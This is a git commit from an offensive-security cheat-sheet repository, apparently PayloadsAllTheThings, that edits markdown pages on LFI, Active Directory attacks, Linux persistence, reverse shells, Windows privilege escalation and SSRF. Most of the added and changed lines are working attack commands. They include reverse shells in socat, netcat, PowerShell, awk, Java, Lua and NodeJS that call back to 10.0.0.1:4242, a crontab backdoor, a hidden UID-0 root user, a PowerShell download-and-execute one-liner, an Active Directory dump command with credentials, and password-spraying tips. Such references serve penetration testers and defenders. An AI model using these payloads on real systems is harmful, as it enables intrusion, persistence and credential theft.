Add root user + PHP null byte version

This commit is contained in:
Swissky 2019-06-24 00:21:39 +02:00
parent c3f96c6753
commit 9be62677b6
7 changed files with 72 additions and 21 deletions

View File

@ -33,6 +33,7 @@
* [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus)
* [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite)
* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap)
## Basic LFI ## Basic LFI
@ -44,6 +45,8 @@ http://example.com/index.php?page=../../../etc/passwd
### Null byte ### Null byte
:warning: In versions of PHP below 5.3 we can terminate with null byte.
```powershell ```powershell
http://example.com/index.php?page=../../../etc/passwd%00 http://example.com/index.php?page=../../../etc/passwd%00
``` ```

View File

@ -212,3 +212,5 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27%
* [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066) * [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066)
* [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/) * [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/)
* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) * [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/)
* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql)
* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/)

View File

@ -318,6 +318,11 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
``` ```
or dump the Active Directory and `grep` the content.
```powershell
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
```
### PassTheTicket Golden Tickets ### PassTheTicket Golden Tickets
@ -581,6 +586,8 @@ Alternatively you can use the Metasploit module
Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
```powershell ```powershell
@ -646,3 +653,4 @@ Most of the time the best passwords to spray are :
* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html)
* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf)
* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) * [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/)
* [WHATS SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/)

View File

@ -1,5 +1,21 @@
# Linux - Persistence # Linux - Persistence
## Summary
* [Basic reverse shell](#basic-reverse-shell)
* [Add a root user](#add-a-root-user)
* [Suid Binary](#suid-binary)
* [Crontab - Reverse shell](#crontab-reverse-shell)
* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc)
* [Backdooring a startup service](#backdoor-a-startup-service)
* [Backdooring a user startup file](#backdooring-an-user-startup-file)
* [Backdooring a driver](#backdooring-a-driver)
* [Backdooring the APT](#backdooring-the-apt)
* [Backdooring the SSH](#backdooring-the-ssh)
* [Tips](#tips)
* [References](#references)
## Basic reverse shell ## Basic reverse shell
```bash ```bash
@ -8,6 +24,13 @@ ncat --sctp -lvp 4242
ncat --tcp -lvp 4242 ncat --tcp -lvp 4242
``` ```
## Add a root user
```powershell
sudo useradd -ou 0 -g 0 john
sudo passwd john
```
## Suid Binary ## Suid Binary
```powershell ```powershell
@ -19,13 +42,15 @@ chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant chmod 4777 $TMPDIR2/croissant
``` ```
## Crontab (Reverse shell to 192.168.1.2 on port 4242) ## Crontab - Reverse shell
```bash ```bash
(crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null
``` ```
## Backdooring an user's bash_rc (FR/EN Version) ## Backdooring a user's bash_rc
(FR/EN Version)
```bash ```bash
TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0" TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0"
@ -48,7 +73,7 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null"
sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart
``` ```
## Backdooring an user startup file ## Backdooring a user startup file
Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop` Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop`

View File

@ -5,6 +5,7 @@
* [Reverse Shell](#reverse-shell) * [Reverse Shell](#reverse-shell)
* [Bash TCP](#bash-tcp) * [Bash TCP](#bash-tcp)
* [Bash UDP](#bash-udp) * [Bash UDP](#bash-udp)
* [Socat](#socat)
* [Perl](#perl) * [Perl](#perl)
* [Python](#python) * [Python](#python)
* [PHP](#php) * [PHP](#php)
@ -50,6 +51,15 @@ Listener:
nc -u -lvp 4242 nc -u -lvp 4242
``` ```
### Socat
```powershell
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
```
Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
### Perl ### Perl
```perl ```perl
@ -118,12 +128,13 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","
```bash ```bash
nc -e /bin/sh [IPADDR] [PORT] nc -e /bin/sh [IPADDR] [PORT]
nc.traditional -e /bin/bash 10.0.0.1 4444
``` ```
### Netcat OpenBsd ### Netcat OpenBsd
```bash ```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
``` ```
### Ncat ### Ncat
@ -147,11 +158,11 @@ user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet
### Powershell ### Powershell
```powershell ```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
``` ```
```powershell ```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
``` ```
```powershell ```powershell
@ -161,21 +172,21 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
### Awk ### Awk
```powershell ```powershell
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
``` ```
### Java ### Java
```java ```java
r = Runtime.getRuntime() r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor() p.waitFor()
``` ```
### War ### War
```java ```java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file strings reverse.war | grep jsp # in order to get the name of the file
``` ```
@ -185,13 +196,13 @@ strings reverse.war | grep jsp # in order to get the name of the file
Linux only Linux only
```powershell ```powershell
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
``` ```
Windows and Linux Windows and Linux
```powershell ```powershell
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
``` ```
### NodeJS ### NodeJS
@ -202,7 +213,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
cp = require("child_process"), cp = require("child_process"),
sh = cp.spawn("/bin/sh", []); sh = cp.spawn("/bin/sh", []);
var client = new net.Socket(); var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){ client.connect(4242, "10.0.0.1", function(){
client.pipe(sh.stdin); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stdout.pipe(client);
sh.stderr.pipe(client); sh.stderr.pipe(client);
@ -213,12 +224,12 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
or or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')
or or
-var x = global.process.mainModule.require -var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') -x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')
or or

View File

@ -23,6 +23,10 @@
## Tools ## Tools
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
```powershell
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
```
- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
```powershell ```powershell
@ -43,10 +47,6 @@
```powershell ```powershell
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
``` ```
- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
```powershell
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
```
## Windows Version and Configuration ## Windows Version and Configuration

View File

@ -114,6 +114,7 @@ http://0000::1:3128/ Squid
### Bypass localhost with a domain redirection ### Bypass localhost with a domain redirection
```powershell ```powershell
http://spoofed.burpcollaborator.net
http://localtest.me http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
@ -629,3 +630,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se
- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)
- [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)
- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/)
- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf)